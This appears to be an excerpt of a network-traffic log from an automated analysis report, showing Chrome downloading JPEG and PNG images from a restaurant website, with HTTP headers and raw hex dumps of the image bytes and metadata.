                                                                                                                                                    2024-10-01 04:26:55 UTC16384INData Raw: 7d 9a 97 69 c5 55 76 bf 51 d3 1b 75 75 bd b5 d7 6c 68 5d 63 be a7 05 b7 41 dc ef f4 26 da 76 3a 9b f5 5b 53 a8 da dd b7 a0 eb 7b 85 ea ba 1e b8 d4 7e eb d8 6d 55 6e de 9b 57 6f 62 96 d8 1a f4 e3 7e da 96 a6 f4 71 6e d6 b3 3b 53 91 76 bd cb 3f d7 fa 0e d6 ff 00 b1 3a b4 de ef 6f fa ef 6a 8b 9d 9d 6b 3a 6f ee 6f 1d 6e b2 e2 36 76 f5 ff 00 b3 f6 0e 9a cf fe e3 5b ac 00 66 56 7a c9 2d 50 0d 52 a6 57 54 a2 6a 81 44 d0 b9 eb 4c d8 d1 1c aa 2d b5 9b 2d dc 36 97 46 b2 d5 0d 1e a0 05 97 5b 55 74 27 61 6d 7d 4f d7 92 e3 a9 d1 05 db 1a b8 87 aa d0 7d 8b 3e bd 75 f4 d7 f5 dd 8a 86 a7 c5 45 5b 2a d7 5b 47 2e 7a da a7 8f 5d 6e fb 36 af 6c 95 6a f1 22 64 cf 90 c5 b6 07 06 06 04 02 0f 9c 0c e2 62 71 f4 6b 86 ac c6 d7 11 f4 d1 a1 d5 61 1b 5c 81 c0 80 ca b0 e4 43 61 10 3d
                                                                                                                                                    Data Ascii: }iUvQuulh]cA&v:[S{~mUnWob~qn;Sv?:ojk:oon6v[fVz-PRWTjDL--6F[Ut'am}O}>uE[*[G.z]n6lj"dbqka\Ca=
                                                                                                                                                    2024-10-01 04:26:55 UTC8245INData Raw: e0 81 7a 0f 61 ad 38 a0 1e 97 54 a0 43 5e 67 54 c6 eb 85 17 c9 55 11 f1 5c 59 16 14 d0 ab 5b 82 7b ae 00 2e 1c 1d 57 b9 7c cf b2 ae 07 24 38 93 4e d4 c4 ba ad ca fe 68 98 28 8e 25 06 be af c9 3d d3 68 87 0e 5a 26 d7 82 e6 a8 f4 41 97 2f 9a 1c 74 2b ed 42 94 28 2d 7b 95 3b d7 cd 12 17 cd 38 d1 3d dd 71 1a 84 59 53 bc 70 4c d5 4e d5 f8 26 b1 bb ae 46 fc fd 82 e3 9a ec 5c 78 95 6a fc 15 07 7a 20 16 e5 a2 de 61 1c 83 f0 cc 3c 51 2c 03 9a 81 40 13 3f 72 a5 3d 9f 34 2a ef 75 75 7e ce 4b 9d 9d 30 b2 07 45 60 f7 4c 19 51 7c fd 8c cc 51 e4 99 73 e0 8d 1e 5c 11 20 51 d3 3b 71 4f aa 21 fb 97 12 51 2f 75 c0 8e 0b 8a 14 67 f8 aa 8a aa 7f 9f 35 f6 fb 18 69 65 77 ad 4a 72 be c6 45 a8 75 5c f4 09 f5 b2 e6 8f cd 73 29 ca 71 53 73 da be 28 6b cd 57 dc 9b de 87 6a 7d 57 dc
                                                                                                                                                    Data Ascii: za8TC^gTU\Y[{.W|$8Nh(%=hZ&A/t+B(-{;8=qYSpLN&F\xjz a<Q,@?r=4*uu~K0E`LQ|Qs\ Q;qO!Q/ug5iewJrEu\s)qSs(kWj}W


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    120192.168.2.449887162.0.209.2394435428C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-10-01 04:26:54 UTC658OUTGET /assets/imgs/img_recipe_8.jpg HTTP/1.1
                                                                                                                                                    Host: www.afghanhayatrestaurant.com.au
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                    Referer: https://www.afghanhayatrestaurant.com.au/assets/css/custom.css
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2024-10-01 04:26:54 UTC354INHTTP/1.1 200 OK
                                                                                                                                                    keep-alive: timeout=5, max=100
                                                                                                                                                    cache-control: public, max-age=604800
                                                                                                                                                    expires: Tue, 08 Oct 2024 04:26:54 GMT
                                                                                                                                                    content-type: image/jpeg
                                                                                                                                                    last-modified: Thu, 05 Oct 2023 21:14:44 GMT
                                                                                                                                                    accept-ranges: bytes
                                                                                                                                                    content-length: 165434
                                                                                                                                                    date: Tue, 01 Oct 2024 04:26:54 GMT
                                                                                                                                                    server: LiteSpeed
                                                                                                                                                    x-turbo-charged-by: LiteSpeed
                                                                                                                                                    connection: close
                                                                                                                                                    2024-10-01 04:26:54 UTC16384INData Raw: ff d8 ff e1 1f 50 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 11 01 00 00 03 00 00 00 01 0f a0 00 00 01 01 00 03 00 00 00 01 17 70 00 00 01 02 00 03 00 00 00 03 00 00 00 da 01 06 00 03 00 00 00 01 00 02 00 00 01 0f 00 02 00 00 00 06 00 00 00 e0 01 10 00 02 00 00 00 12 00 00 00 e6 01 12 00 03 00 00 00 01 00 01 00 00 01 15 00 03 00 00 00 01 00 03 00 00 01 1a 00 05 00 00 00 01 00 00 00 f8 01 1b 00 05 00 00 00 01 00 00 01 00 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 22 00 00 01 08 01 32 00 02 00 00 00 14 00 00 01 2a 02 13 00 03 00 00 00 01 00 02 00 00 9c 9d 00 01 00 00 00 02 00 00 00 00 87 69 00 04 00 00 00 01 00 00 01 40 88 25 00 04 00 00 00 01 00 00 05 24 00 00 05 38 00 08 00 08 00 08 43 61 6e 6f 6e 00 43 61 6e 6f 6e 20 45 4f 53 20 32 30 30
                                                                                                                                                    Data Ascii: PExifMM*p(1"2*i@%$8CanonCanon EOS 200
                                                                                                                                                    2024-10-01 04:26:55 UTC16384INData Raw: 9e a2 fb 4f 76 b5 84 7f d5 c2 a5 7f d6 bb 1e 08 f5 6e b0 f6 98 68 9f 91 5c ee c2 9c 57 af 29 c3 95 c2 3a 2b de ca 5d 33 d7 af 7b fd 4b 8d 97 3b 8f 75 86 07 c1 57 ca ea b6 64 88 7b 74 e7 dc e7 3b f8 a0 39 b4 35 f0 37 3c 77 9d 3f bd 26 3b 1c 4e ea f7 4e 83 52 23 cf 44 f1 8e 00 d8 89 51 96 43 a1 9c 47 f2 f2 63 5d f6 d6 e2 6b 3b 49 d0 c2 3b 73 33 c5 6e 0c 76 d6 f2 e0 03 41 d7 4f eb 28 35 b5 07 b0 31 db 49 06 5c 7b 1d 74 ee ba 1f d8 b8 83 09 d6 35 cc 16 58 d6 d9 5d 2f 12 41 8f d2 56 6d 05 ce fa 5f cd 7f e0 96 21 92 70 15 71 06 fb 85 d8 f1 e4 20 81 33 a7 ee 97 9a b2 eb ed 71 2f 7b 9c 7b c9 4d e9 5b 13 b4 f1 3f 29 84 67 13 53 bd 93 c4 b1 ce 10 48 23 e6 83 36 78 a7 d8 ad 85 31 f0 6a 3d 46 cf 57 ff d0 f3 6c a7 d1 6d f6 d9 5b 4b 69 75 9a 10 74 9f ce 76 c7 7e ff 00
                                                                                                                                                    Data Ascii: Ovnh\W):+]3{K;uWd{t;957<w?&;NNR#DQCGc]k;I;s3nvAO(51I\{t5X]/AVm_!pq 3q/{{M[?)gSH#6x1j=FWlm[Kiutv~
                                                                                                                                                    2024-10-01 04:26:55 UTC16384INData Raw: 0e 8b 81 6a 17 52 80 00 0a 3c f4 f2 4e 7d 68 28 e2 1e 9b d1 85 1e 7d 3f 29 5f a8 87 9c 4d bc f8 1b f9 53 4b 86 4c ec 3d 29 98 fa 10 f6 e1 95 97 4f d7 1f 2f 7b 2e 66 bc eb 49 db c5 f3 87 77 7f 96 eb d3 5b bb a9 ea cd ab c9 b7 95 57 5f 82 97 9d ec d5 23 48 69 c9 db 4b e6 fd 3d 2f 6f 8d c6 ba 9e df ce f4 7e c5 ec f3 2a b3 e8 76 a1 c6 94 a2 94 ea f9 8b cb fd 05 a7 a5 c6 73 57 5b 7b 17 a5 f0 74 b9 9e 5d cb f6 4f c7 4d 96 05 a7 47 97 eb 3e af c5 6c f7 e1 90 f9 ea e8 93 37 47 25 b5 13 05 3c a9 59 35 4b 92 96 6f 3a f9 f7 97 48 c3 ac 67 dc be c7 9f 62 e6 bd ba 9a 72 12 eb 1a 43 c0 c8 d4 24 0e d9 4c d4 00 00 14 d1 7e 41 cf be 71 96 08 9a 9c 84 e9 73 df e5 5d 3d 21 90 76 f2 a2 6d e7 ce 34 80 67 3f 0f 55 f8 e9 8f 7c 97 9c bd 7f 5d 7c bd dc 26 de 4e f3 a3 2f 9c bd 1e
                                                                                                                                                    Data Ascii: jR<N}h(}?)_MSKL=)O/{.fIw[W_#HiK=/o~*vsW[{t]OMG>l7G%<Y5Ko:HgbrC$L~Aqs]=!vm4g?U|]|&N/
                                                                                                                                                    2024-10-01 04:26:55 UTC16336INData Raw: 40 a8 65 6b 83 4f 43 f6 fe a8 ad 81 fd cb 3d 22 2a 16 e1 ae 4d ea cf b9 e8 7a b8 e5 cd fb 27 ab 72 f9 bb ee 55 8e ed 9e 42 e5 03 c0 84 f6 6c 6f ee df da 09 05 ee 5e 49 a7 b0 66 40 78 4e 72 ca 28 2c 20 42 ca 0e 41 36 36 94 23 68 fd 10 7a 05 dd 12 51 ca c9 59 2b 1d 72 b3 d3 23 a1 fb 75 23 a3 86 54 e3 bf d9 43 61 d1 a8 36 e5 45 7a 37 27 3b b3 7a 15 7f fb 87 40 a1 62 68 c0 72 6f 56 8e 8d e8 3e ce 38 5f 77 37 a4 8e c0 90 92 5b f7 52 3b c9 02 0a 12 38 35 df 63 9c 8e c8 bf bb d8 40 0e 40 a7 bf 03 1d 09 ef 94 1c 13 50 c2 32 34 20 c0 41 0c 08 3d 81 47 20 70 fa cb 80 4c 3d 7b 2e cb b7 4c 2f eb 84 09 58 2b 0b 1d 30 8a 28 61 12 b3 d0 ab 00 64 e1 7f 46 46 53 da 41 8e f4 ad 50 6d 46 63 b0 c7 a2 b6 0e fd e3 a3 5c a9 77 2d 4e fb 8e a0 76 43 ee 82 94 a6 8e e3 a5 e7 62 32
                                                                                                                                                    Data Ascii: @ekOC="*Mz'rUBlo^If@xNr(, BA66#hzQY+r#u#TCa6Ez7';z@bhroV>8_w7[R;85c@@P24 A=G pL={.L/X+0(adFFSAPmFc\w-NvCb2
                                                                                                                                                    2024-10-01 04:26:55 UTC48INData Raw: 85 a3 c7 c8 04 f7 e5 09 00 42 40 57 98 59 1f 41 59 4d 28 b9 3c ae c8 c6 83 0f 51 95 92 89 29 a9 cd 08 84 e0 9f d9 10 9c 3b e1 78 af 22 80 71 5d
                                                                                                                                                    Data Ascii: B@WYAYM(<Q);x"q]
                                                                                                                                                    2024-10-01 04:26:55 UTC16384INData Raw: c2 ee bd 80 2f 30 8b 97 b3 0b cd e5 65 c8 92 8e 51 69 5e b2 bb af 5a 0c 41 88 f4 1d 5a a4 88 38 b9 81 36 1c af c5 7b 8c 55 57 e3 b4 27 30 05 e2 bd 1f ba 46 28 47 62 16 4a fb a1 85 80 bd 60 b5 f1 85 e0 8b 51 1d 1c 11 20 27 1c a0 99 2e 17 b9 48 fc b9 e7 b3 4f 6f 21 89 0e 13 50 29 a9 a5 07 22 81 1d 30 80 45 3a 20 51 88 05 84 00 59 08 bd 12 b3 d3 29 a0 94 d8 1c 9d 58 14 f8 1a 11 7c 01 3a d4 00 be db 57 b9 e5 79 3d 17 12 87 92 39 5e 39 5e 21 10 c0 84 c0 23 32 f7 2f 61 5e c2 bc 8a f2 2b c8 af 63 93 65 70 5e f2 8c a0 af 30 8c 81 7b 13 0f 7f 6e 11 95 47 63 06 1b b5 f0 26 63 88 73 42 73 d3 9e 17 62 81 18 72 8c 60 ac 2c 3f c8 02 88 29 8e 38 9c 9c ba 72 10 9f 2b da 57 b1 17 94 0e 53 1e 10 ee 9f f6 6f 75 df c8 94 1c 81 e9 8c af 12 13 41 e8 5f 84 1f 94 0a 0e 5e d4 1e
                                                                                                                                                    Data Ascii: /0eQi^ZAZ86{UW'0F(GbJ`Q '.HOo!P)"0E: QY)X|:Wy=9^9^!#2/a^+cep^0{nGc&csBsbr`,?)8r+WSouA_^
                                                                                                                                                    2024-10-01 04:26:55 UTC16384INData Raw: 69 66 d3 e1 a9 be 70 d4 c7 61 b2 7f e7 0d a1 4b 41 a5 aa 2b 71 6a d1 c3 53 5e d6 1a b5 84 5d 1c c6 b8 4d a9 d6 cc 46 87 4c 04 7c 7b 43 1b a2 8d 91 b1 6c e9 50 bb 40 f1 df 88 9f 06 b3 84 fc 68 27 8e b6 86 b2 dc f0 ce 35 bb 6d ef 8e b8 b6 ca be cb e3 da 3b 0b 37 3e 3d 0e d6 49 f1 d9 6d 7d 07 14 bd aa d8 7d 1b 31 9d 71 ce 48 ed b1 ad 25 aa 3a 7d 0d 1d 7b 26 6e 4d 17 30 dd e5 3f 09 e8 76 e7 92 7c 2d c8 35 6b 69 ad bd 56 c3 21 2d 86 4f ef 8c 65 e7 b3 0a 8f fb be 12 61 fc 46 7f 6b 9c 7c 69 b4 fb 3e 4c ba fa fc 7f 6b 69 d3 dd 87 b9 98 f5 d5 3f c4 ee 60 12 42 a2 38 95 a4 3a 1d 83 3f fd 98 18 1b 5a 73 99 15 60 bf d7 2e 17 05 4d 7c b6 9e e7 af 9e a7 31 7c 69 a0 ab b9 d9 70 5e 26 4d 7a fc 8b 4b 47 ff 00 3f a5 95 c3 7b f1 85 ea 1a 2d 8f 3a 9e ad ae 6f ce 34 d4 ad c1
                                                                                                                                                    Data Ascii: ifpaKA+qjS^]MFL|{ClP@h'5m;7>=Im}}1qH%:}{&nM0?v|-5kiV!-OeaFk|i>Lki?`B8:?Zs`.M|1|ip^&MzKG?{-:o4
                                                                                                                                                    2024-10-01 04:26:55 UTC16384INData Raw: c1 7b c9 f2 76 72 56 4f d2 c0 4a 0c 2b d6 bd 68 46 bc 17 82 0c 5e 01 06 84 30 09 70 2b b2 c8 59 0b 21 07 05 e4 11 78 45 eb cd 7b 42 32 04 64 08 c8 11 91 7b 48 46 62 47 b0 a2 f7 2c 95 93 fc 9a 2f fb 1c f2 d9 5a 51 67 91 30 b9 7a de 8c 52 05 e0 e4 18 e5 e0 e4 23 72 64 19 4e af 83 e9 2b d4 84 28 44 13 58 02 ec bb 2c 85 90 b2 17 92 f2 5e 65 79 95 e7 d8 ca 17 b0 2f 60 46 54 66 5e e2 8c a5 7b 5c bc ca f3 72 c9 59 2b 27 f9 74 5f f6 4b ff 00 64 5d c6 70 7c 88 51 48 04 97 ad c7 33 bc 82 c8 59 6e 0b 80 4c 94 02 fb 0d 78 2f 0b c8 2f 30 bc c2 32 05 ed 0b da d4 65 6a f7 2f 6a f7 15 ed 72 f6 39 17 b9 64 ac f4 cf f3 88 bf ec 92 39 0c 8d 64 cd 27 da 56 25 58 9b 3e 33 2f 09 57 84 ab c2 65 e1 32 f0 95 78 cc bc 66 5e 12 af 09 57 ae 55 eb 91 7a e4 5e a9 17 aa 45 ea 91 7a a4
                                                                                                                                                    Data Ascii: {vrVOJ+hF^0p+Y!xE{B2d{HFbG,/ZQg0zR#rdN+(DX,^ey/`FTf^{\rY+'t_Kd]p|QH3YnLx//02ej/jr9d9d'V%X>3/We2xf^WUz^Ez
                                                                                                                                                    2024-10-01 04:26:55 UTC16384INData Raw: 9d 2c 86 48 59 41 8d db 8a 9a 4d c6 4f 1b 66 39 54 2e 73 22 f7 14 18 2f 88 1b d1 5d 36 27 0a 62 50 6a 26 fd b4 b2 30 0a c3 8d 69 56 07 0e 75 71 35 8f d9 bd 5c 48 68 02 6f fb 68 0a 18 76 5e bb 6b 7c b9 f8 0f d5 5b a5 03 29 1b eb fe 82 de c3 43 2e ce fa 22 e7 4e 74 09 c8 e5 ec 1e de ea 66 b5 c0 61 6e fa 2c a6 d7 53 7a 90 39 be 9e 35 71 49 2a ff 00 2f 6a 41 91 cf 0b d2 6b d2 51 94 fa 6e 31 bd b8 0f de a3 02 ae b6 38 05 fb 3d f4 d2 6a 04 b6 34 2e c3 be ae a6 f6 ab 29 cc 51 3c 2f 85 0a 46 89 6e f9 2f 69 34 b2 c8 4e a2 2e 4f ec a8 d1 89 b5 f1 a4 24 83 96 34 c1 e4 54 2c 0e 26 9e 64 2a 5d 89 4c f0 20 1c a8 68 b5 c5 c3 dc 0c f8 d6 df 60 64 d3 1b dd dc e5 e1 41 7a dc ab a8 f5 7a 86 e1 a5 69 08 20 e8 51 a2 35 c7 ec a8 bf f6 aa 67 32 b4 51 ca be 96 dc df 00 aa 72 39
                                                                                                                                                    Data Ascii: ,HYAMOf9T.s"/]6'bPj&0iVuq5\Hhohv^k|[)C."Ntfan,Sz95qI*/jAkQn18=j4.)Q</Fn/i4N.O$4T,&d*]L h`dAzzi Q5g2Qr9
                                                                                                                                                    2024-10-01 04:26:55 UTC16384INData Raw: 20 17 39 01 db 52 bb 18 da 10 43 47 c4 56 d9 76 be 84 3f 86 c3 52 2d f5 ff 00 15 f9 50 de ef 27 0c ed c1 7c 28 05 b8 2d 47 13 c8 02 be 20 8e 06 b7 88 87 52 eb 36 61 c4 51 6b 67 95 aa 09 18 1b 1b 00 78 63 40 07 20 0a 37 66 b1 ab 2d ed fa a8 2c 71 17 63 81 e3 40 32 59 89 be 3c 28 ee 66 7b 44 a2 fe 1a 30 80 4c 48 6c cc 79 d0 83 6c e1 3b cf 01 ca 99 27 9b 4b a9 b6 75 f7 8c 4d b2 e4 6a 3f 4b 6e 04 96 fe 68 25 be 8a 69 26 d8 eb 55 f9 cd 85 ed d8 68 cb b3 d8 8d 59 6b e1 4d 2b 1d 20 f0 bd 16 cc 0c eb c2 70 be 35 7b 83 ca b4 82 01 fa 6b 07 02 f4 49 96 d5 d1 25 57 f5 0c db 56 32 37 ef c7 ba 9e 33 f4 05 f6 32 38 0c 8e 0a b2 9c 88 38 11 44 ef fa 3b 0d e3 ab 46 a1 03 90 c1 75 20 5f 54 69 d3 e1 1f 37 86 a5 d9 08 f7 10 6d b7 00 44 f0 01 2e 9b 16 d6 1a e0 92 b6 20 9b 96
                                                                                                                                                    Data Ascii: 9RCGVv?R-P'|(-G R6aQkgxc@ 7f-,qc@2Y<(f{D0LHlyl;'KuMj?Knh%i&UhYkM+ p5{kI%WV273288D;Fu _Ti7mD.


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    121192.168.2.449888162.0.209.2394435428C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-10-01 04:26:54 UTC386OUTGET /assets/imgs/food_menu_boqt.png HTTP/1.1
                                                                                                                                                    Host: www.afghanhayatrestaurant.com.au
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    Accept: */*
                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2024-10-01 04:26:55 UTC352INHTTP/1.1 200 OK
                                                                                                                                                    keep-alive: timeout=5, max=100
                                                                                                                                                    cache-control: public, max-age=604800
                                                                                                                                                    expires: Tue, 08 Oct 2024 04:26:55 GMT
                                                                                                                                                    content-type: image/png
                                                                                                                                                    last-modified: Wed, 05 Apr 2023 14:05:30 GMT
                                                                                                                                                    accept-ranges: bytes
                                                                                                                                                    content-length: 17617
                                                                                                                                                    date: Tue, 01 Oct 2024 04:26:55 GMT
                                                                                                                                                    server: LiteSpeed
                                                                                                                                                    x-turbo-charged-by: LiteSpeed
                                                                                                                                                    connection: close
                                                                                                                                                    2024-10-01 04:26:55 UTC16032INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 37 00 00 00 40 08 06 00 00 00 be fc ef 3f 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 3b 6a 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 0a 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 31 31 20 37 39 2e 31 35 38 33 32 35 2c 20 32 30 31 35 2f 30 39 2f 31 30 2d 30 31 3a 31 30 3a 32 30 20 20 20 20 20 20 20 20 22 3e 0a 20 20 20 3c 72 64 66
                                                                                                                                                    Data Ascii: PNGIHDR7@?pHYs;jiTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?><x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c111 79.158325, 2015/09/10-01:10:20 "> <rdf
                                                                                                                                                    2024-10-01 04:26:55 UTC1585INData Raw: e9 6d 49 9b 24 ad 93 b4 5e d2 16 49 7b bd 76 93 a4 39 92 3e 2b e9 d3 92 6e f2 5e 8b 24 fd c1 7b 8c 8e a2 92 82 a4 25 92 96 bb 3f ce e3 2e 8c 23 94 b0 33 df 83 76 48 5a 20 69 92 a4 3b 25 35 4b ba 3b 18 37 c7 e3 ee 72 b8 56 2f e9 06 bf eb 66 a2 36 fb 7e a3 a4 fe 92 3a 48 6a 67 c4 3a 49 aa 75 b8 34 55 d2 6b 92 0e 78 ff 3a bf 7b 40 d2 00 1f 46 bd a4 ce c1 fe 27 49 5a 2d 69 65 5b 88 9b e2 41 db 24 4d 37 ec 0a c3 c6 b8 7f b5 fb 2b bc e8 93 3e 00 24 0d 34 97 16 1a b1 d6 c6 89 1d 25 5d 2e 69 83 a4 06 49 7d 82 77 5f f6 7e 93 03 58 95 a4 35 96 06 24 7d bb 18 71 29 bb ab 25 ad f5 c0 97 24 7d 44 d2 f3 92 b6 1b 81 2a 8b 96 8c c0 48 3f cf 94 74 81 a4 dd 92 ee 8f 82 db 82 af 24 82 27 19 f0 3a 49 cb 24 bd ec fd 52 f8 5f 25 ed 31 3e e9 fc e7 ac 3e 48 ba 36 8f b8 34 dc 29
                                                                                                                                                    Data Ascii: mI$^I{v9>+n^${%?.#3vHZ i;%5K;7rV/f6~:Hjg:Iu4Ukx:{@F'IZ-ie[A$M7+>$4%].iI}w_~X5$}q)%$}D*H?t$':I$R_%1>>H64)


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    122192.168.2.449890162.0.209.2394435428C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-10-01 04:26:55 UTC384OUTGET /assets/imgs/img_recipe_1.jpg HTTP/1.1
                                                                                                                                                    Host: www.afghanhayatrestaurant.com.au
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    Accept: */*
                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2024-10-01 04:26:55 UTC353INHTTP/1.1 200 OK
                                                                                                                                                    keep-alive: timeout=5, max=100
                                                                                                                                                    cache-control: public, max-age=604800
                                                                                                                                                    expires: Tue, 08 Oct 2024 04:26:55 GMT
                                                                                                                                                    content-type: image/jpeg
                                                                                                                                                    last-modified: Wed, 27 Sep 2023 21:00:30 GMT
                                                                                                                                                    accept-ranges: bytes
                                                                                                                                                    content-length: 76671
                                                                                                                                                    date: Tue, 01 Oct 2024 04:26:55 GMT
                                                                                                                                                    server: LiteSpeed
                                                                                                                                                    x-turbo-charged-by: LiteSpeed
                                                                                                                                                    connection: close
                                                                                                                                                    2024-10-01 04:26:55 UTC16031INData Raw: ff d8 ff e1 16 b0 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 0c 01 00 00 03 00 00 00 01 04 cb 00 00 01 01 00 03 00 00 00 01 03 b5 00 00 01 02 00 03 00 00 00 03 00 00 00 9e 01 06 00 03 00 00 00 01 00 02 00 00 01 12 00 03 00 00 00 01 00 01 00 00 01 15 00 03 00 00 00 01 00 03 00 00 01 1a 00 05 00 00 00 01 00 00 00 a4 01 1b 00 05 00 00 00 01 00 00 00 ac 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 22 00 00 00 b4 01 32 00 02 00 00 00 14 00 00 00 d6 87 69 00 04 00 00 00 01 00 00 00 ec 00 00 01 24 00 08 00 08 00 08 00 0a fc 80 00 00 27 10 00 0a fc 80 00 00 27 10 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 43 43 20 32 30 31 35 20 28 57 69 6e 64 6f 77 73 29 00 32 30 32 33 3a 30 39 3a 32 37 20 31 37 3a 30 30 3a 32 36 00 00 00 00 04 90 00 00 07 00
                                                                                                                                                    Data Ascii: ExifMM*(1"2i$''Adobe Photoshop CC 2015 (Windows)2023:09:27 17:00:26
                                                                                                                                                    2024-10-01 04:26:55 UTC16384INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                    Data Ascii:
                                                                                                                                                    2024-10-01 04:26:55 UTC16384INData Raw: c4 50 3f b8 58 fe 45 9e 9a c5 3f 5f b5 73 a4 de ab 3c d0 f7 3d f6 b4 0b cf e2 d8 29 62 87 42 a4 b4 e3 90 fd 52 de a3 1c 7c eb 15 af 98 63 97 9d 73 9f 6e 77 ed df 9d 6c 5c 3f cd 93 97 cd f5 b3 1a 46 81 01 de 3b 04 5f 79 f6 a6 bf 60 00 54 a1 cf 1d 05 85 80 3f 19 bd e7 f5 ef 2d 6a f0 9c 0f af e0 42 e4 96 5d e7 b8 70 ec ce fc 0f 70 4a 70 54 ec 56 e8 3f b2 fa ed cb 36 a5 8e 4a 2d 23 34 ae cb fb 56 a3 15 52 f1 99 43 94 86 ca a0 96 d6 cd 48 2b f5 28 72 f9 30 56 ab 38 e6 d7 9f dc ad cf 20 a3 71 eb bf 2a e4 d4 ed 51 ef 47 d1 aa 19 23 8e 85 d1 52 dc b0 ca ed 5c bb c1 cd 89 a0 4e 47 21 e7 9d 10 0f c1 39 ef 7e d9 f5 2f 88 24 7c 00 c7 11 3e dc 20 33 cf 1c 25 79 fc f9 af dd 8e 34 ab 5e 56 0e f6 df 48 07 c8 1b c8 81 0f d6 e2 f1 9e 4a 5c c8 68 c5 6a 1a ee bd 5e 17 9c f7
                                                                                                                                                    Data Ascii: P?XE?_s<=)bBR|csnwl\?F;_y`T?-jB]ppJpTV?6J-#4VRCH+(r0V8 q*QG#R\NG!9~/$|> 3%y4^VHJ\hj^
